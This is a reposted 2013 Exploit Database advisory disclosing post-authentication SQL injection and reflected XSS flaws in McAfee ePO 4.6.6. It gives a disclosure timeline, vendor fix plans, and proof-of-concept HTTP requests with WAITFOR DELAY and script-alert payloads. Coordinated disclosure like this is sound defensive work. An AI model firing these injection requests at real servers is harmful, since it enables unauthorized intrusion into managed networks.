McAfee ePO 4.6.6 – Multiple Vulnerabilities

• Exploit Database
• 8 阅读

• 作者： Nuri Fattah
  日期： 2013-07-13
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26807/

• Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC
  
  
  Multiple vulnerabilities in McAfee ePO 4.6.6
   
  Affected Product:
  McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions
   
  Timeline:
   
  08 June 2013- Vulnerability found
  12 June 2013- Vendor informed
  12 June 2013- Vendor replied/confirmed & opened service ticket
  12 July 2013- Vendor responded with dates for solutions
   
  Credits:
  Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
   
  CVE: To be assigned
   
  NCIRC ID: NCIRC-2013127-01
   
  Description:
  Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL
  injection were identified in the latest version of McAfee ePO (4.6.6).
  All identified vulnerabilities were discovered post authentication.
   
  
  Vulnerability Details:
   
  1. SQL injection
  
  a. GET
  /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf
  or%20delay'0%3a0%3a20'--
  &index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax
  Mode=standard HTTP/1.1
  
  b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer
  &uid=1;%20WAITFOR%20DELAY%20'0:0:0';--
  &datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory
  %3Aquery.2&index=0 HTTP/1.1
  
  McAfee Solution:
  
  Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
  Item "b" has been addressed per Security Bulletin SB10043.
  (https://kc.mcafee.com/corporate/index?page=content&id=SB10043)
   
   
  
  
  2. Reflected XSS
  a. POST /core/loadDisplayType.do HTTP/1.1=20
  displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
   
  b. POST /console/createDashboardContainer.do HTTP/1.1
  displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
   
  c. POST /console/createDashboardContainer.do HTTP/1.1
  elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&
  width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&mo
  nitorUrl=http%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</script>&orion.user.sec
  urity.token=9BslgbJEv2JqQy3k&ajaxMode=standard
   
  d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
   
  e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
   
  f. GET /ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&orion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><script>alert(30629)</script> HTTP/1.1
   
  g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
   
  
  h. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script>&orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>"'><script>alert(30565)</script> HTTP/1.1
   
  
  McAfee Solution:
  
  Each of these items will be addressed in ePO 4.6.7 due out in late Q3
  2013.
  
  
  
  
  Nuri FATTAH
  CTR
  NATO Communications and Information Agency
  Engineering & Vulnerability Management Sections
  NATO Information Assurance Technical Centre
  SHAPE, 7010 Mons, Belgium
  T: +32 6544 6140 F: +32 6544 5414
  SHAPE NCN: 254 6140
  E: nuri.fattah@ncirc.nato.intW: www.ncirc.nato.int